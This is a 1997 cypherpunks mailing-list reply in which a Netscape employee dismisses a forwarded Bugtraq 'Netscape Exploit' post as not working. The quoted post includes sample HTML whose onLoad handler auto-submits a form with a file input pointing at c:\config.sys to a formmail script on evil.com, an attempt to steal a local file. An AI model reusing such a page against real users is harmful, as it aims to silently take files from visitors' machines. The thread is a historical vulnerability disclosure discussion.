Netscape Exploit
Tom Weinstein
tomw at netscape.com
Sun Jun 15 01:36:51 PDT 1997
Lucky Green wrote:
>
> >Approved-By: aleph1 at UNDERGROUND.ORG
> >Date: Sat, 14 Jun 1997 19:21:30 -0500
> >Reply-To: root <root at BACKWATER.PBX.ORG>
> >Sender: Bugtraq List <BUGTRAQ at NETSPACE.ORG>
> >From: root <root at BACKWATER.PBX.ORG>
> >Subject: Netscape Exploit
> >To: BUGTRAQ at NETSPACE.ORG
> >
> >Here is a sample it isn't complete but you get the basic idea of what
> is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> > NAME="daForm"
> > ACTION="http://evil.com/cgi-bin/formmail.pl"
> > METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on
> your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="foobar at evil.com">
Yeah, that's pretty cool. Too bad it doesn't work.
--
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice. You must understand Tao before | tomw at netscape.com
transcending structure. -- The Tao of Programming |
More information about the cypherpunks-legacy
mailing list